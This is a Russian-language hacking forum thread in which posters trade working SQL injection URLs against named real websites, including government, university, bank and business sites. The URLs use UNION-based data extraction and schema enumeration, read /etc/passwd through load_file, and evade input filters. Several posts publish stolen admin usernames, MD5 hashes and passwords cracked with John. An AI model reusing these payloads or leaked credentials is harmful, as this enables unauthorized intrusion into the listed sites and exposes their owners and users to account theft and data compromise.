SQL Инъекции

еще гов))

maps2.nris.mt.gov

Code:

http://maps2.nris.mt.gov/Mapper/MapWindow.asp?Profile=-1+or+1=@@version--
http://maps2.nris.mt.gov/Mapper/MapWindow.asp?Profile=-1+or+1=(select+system_user)--

 

http://anime.kz/index.html

 

www.rusbiz.ru

Ресурс представляет из себя многоотраслевой портал с электронной торговой площадкой. Основной целью портала является содействие компаниям малого и среднего бизнеса в расширении сфер своей деятельности, увеличении объемов продаж, нахождении новых деловых связей за рубежом и проведении бизнес сделок через Интернет. Всё бы хорошо, но... Банальный SQL-Injection в параметре servid.

Получаем список таблиц:

Получаем список полей в заданной таблице:

* Обратите внимание на использование /**/ вместо стандартных вариантов представления пробела... Это вызвано тем, что фходной параметр фильтруется (хоть и криво). Фильтрация делает невозможным использование %20 или + в качестве пробела, также фильтруется =, поэтому пришлось воспользоваться операцией IN.

Из интересных таблиц имеем USER и forum_user, но форум по техническим причинам отключён, поэтому дело будем иметь только с первой таблицей. Таблица имеет такую структуру:

• password - пароль аккаунта в md5
• user_group - группа аккаунта (может быть user, admin и т.д.)
• blocked - активированный аккаунт или нет
• lastlogin - время последнего посещения

Начнём вторжение в святая святых:

По данному запросу возвращается две записи pol и systemuser. Это два админских аккаунта.

Пароли свёрнуты в md5:

pol:890a09778691261d1e1e7c65f6101d3c
systemuser:972c97bdc47dfc8def0e74c55da0bbfd

В помощь Джон и через пару секунд:

pol:51619
systemuser:explore

Ну чтож... Админы никогда не научатся проявлять фантазию при задании паролей от критических ресурсов... Должен заметить, что половина базы снимается одним проходом по словарю и прямым брутом по 0...9 в длине 8 символов.

Не знаю как быстро прикроют эту багу, ибо такое впечатление, что там админ в онлайне... Но в доказательство приведу ещё один аккаунт:

green:1604

 

Code:

http://www.yesmag.ca/bugbeat/bugs.php?id=-8+union+select+1,2,3,4,5,VERSION(),USER()/*

 

PHP:

http://www.lada-auto.ru/cgi-bin/news.pl?id=-1'


 

cs.xeka.ru
движек - psyhostats
вот скули.. нашел почти сразу но были проблемы с выводом.. потом пошаманил с лимит 0 помогло [:

тут еще много ксс, но пару лишь, нашел пока скули искал

много столбцов)


вывод всякой инфи

5.0.45-community-nt-logs_mafia:root@localhost

1 STEAM_0:1:пароли сказали потереть::belo4ka 1 2% 3 12.00
2 АЙ-ПИ::LeXXXuS 1 2% 3 12.00
3 АЙ-ПИ::Admir@L 1 2% 3 12.00
4 АЙ-ПИ::belo4ka 1 2% 3 12.00

belo4ka:пароли сказали потереть:1

1 :пароли сказали потереть:1 1 2% 3 12.00
2 :пароли сказали потереть:10 1 2% 3 12.00


з.ы. вывод понравился так как там была таблица не надо было тянуть по одной))
з.з.ы движек сегодня увидел первый раз.. мо там есть еще что-то поинтереснее но рыть особо не стал [:
з.з.ы ися был осведомлен)
з.з.ы потер пароли и мыла

 

vodnyy.odessa.ua

 

Code:

http://www.vkus.by/index.php?n=-1+union+select+1,2,3,4,5,6/*

MySQL : 4 версия

 

"раскрутил" скулю Slider'a "попроще"
сразу говорю сорри, когда раскручивал не видел что слайдер сам уже раскрутил..

Code:

http://anime.kz/index.html?mode=links&pid=6+UNION+SELECT+1,login,3,4,pwd,6,7+from+user/*

+ своя:

Code:

http://www.borytucholskie.pl/index.php?id=-1+union+select+1,password+from+users/*

пароль, логин - ненашёл

Code:

http://www.borytucholskie.pl/index.php?id=-1+union+select+1,column_name+from+INFOrMATION_SCHEMA.COLUMnS+WHERE+TABLE_NAME=users+limit+0,1/*
http://www.borytucholskie.pl/index.php?id=-1+union+select+1,column_name+from+INFOrMATION_SCHEMA.COLUMnS+WHERE+TABLE_NAME='users'+limit+0,1/*

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /index.php on line 10

 

2BlackCats

Code:

http://www.borytucholskie.pl/index.php?id=-1+union+select+1,column_name+from+INFOrMATION_SCHEMA.COLUMnS+WHERE+TABLE_NAME=CHAR(117,115,101,114,115)+limit+1,1/*

кавычки фильтруются

 

Scipio, хм, я не пойму как вы из этого извлекаете логин и пароль? У меня вот появилось в середине страницы:

А как из этого пользу извлечь не пойму( объясни плз.

 

http://theboard.byu.edu/

Code:

http://theboard.byu.edu/index.php?area=viewall&id=-1+union+select+version(),user(),concat_ws(0x3a,username,user_password),4,database(),6,7,8,0x6865617679206D6574616C203A44,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+100Hrbb_users+limit+1,1
http://theboard.byu.edu/index.php?area=viewall&id=-1+union+select+1,2,load_file(0x2F6574632F706173737764),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+information_schema.tables

http://primes.utm.edu

Code:

http://primes.utm.edu/bios/page.php?id=&username=sdf%27+union+select+concat_ws(0x203a20,username,pass),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2,2,2,2,2,2,2,2,2,2,2,2,2,2+FROM+person+limit+1,1/*

http://hitl.washington.edu (Postgre 8 без прав, лениво ковырять)

Code:

http://www.hitl.washington.edu/people/papers.php?name=jksdelly'+union+select+relname,null,null+from+pg_class+where+relname%3C%3E'alum_person'+and+relname%3C%3E'alum_person_alumid_seq'+and+relname%3C%3E'alum_position'+and+''='

 

Code:

http://www.northberwickuk.com/info.php?id=-1+union+select+0,version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,25,26,27/*&catid=324&f=NorthBerwick&type=featured

Code:

http://www.kinogalerija.lv/info.php?id=-1+union+select+version(),1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/*

 

Code:

http://admiral.delfi.lv/index.php?id=-48390++union+select+1,table_name,3+from+INFORMATION_SCHEMA.TABLES+limit+1,1/*

 

Code:

http://www.ability.nl/info.php?ID=-1+union+select+0,2,version()/*

 

Code:

htp://www.erikdevlieger.com/kunst.php?rq=list&id=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6/*  [email protected]:4.1.21-log:imcavas_erikdevlieger

Code:

http://www.spcompanyspb.com/goods.php?type=-1+union+select+concat(user(),0x3a,version(),0x3a,database())/*&style=5  u7821@localhost:5.0.24-Debian_1-log:u7821: цензуро =\

Code:

  http://www.fenixbel.com/site.php?id=-1+union+select+concat(user(),0x3a,version(),0x3a,database()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/*  [email protected]:5.0.45-log:merkator_2222

 

Code:

http://www.tolkien.it/catalogo/item.asp?ID=1+or+1=(SELECT+TOP+1+passw+from+Tadmins+where+username='roby')--

 

www.chip.ua - сайт журнала CHIP

Code:

http://www.chip.ua/?page=poll&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*

Скуль так розкрутить не удалось =\

P.S: _http://www.ichip.ru/?page=poll&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
тот же результат =)

 

http://www.sgbank.ru/news.asp?news_id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('bankdel','bankseek','cbr','currency_exch','currency_opt','currency_zayavka','doc_req','documents','dtproperties','forums','keybaseb','keybasef','messages','news1'))--
baser192:12345

 

Google Page Rank 8/10
WebAlta WTR 9/10

4-ая версия..

логин+пароль:

Code:

http://www.mnogosearch.org/bugs/bugs.php?id=-1+union+select+1,2,pass,4,5,6,7,8,9,user,11,12,13,14,15,16+from+user/*

логин:
bar
хэш пасса:
948f878a52bb69d5e54fe8d04dcddfd5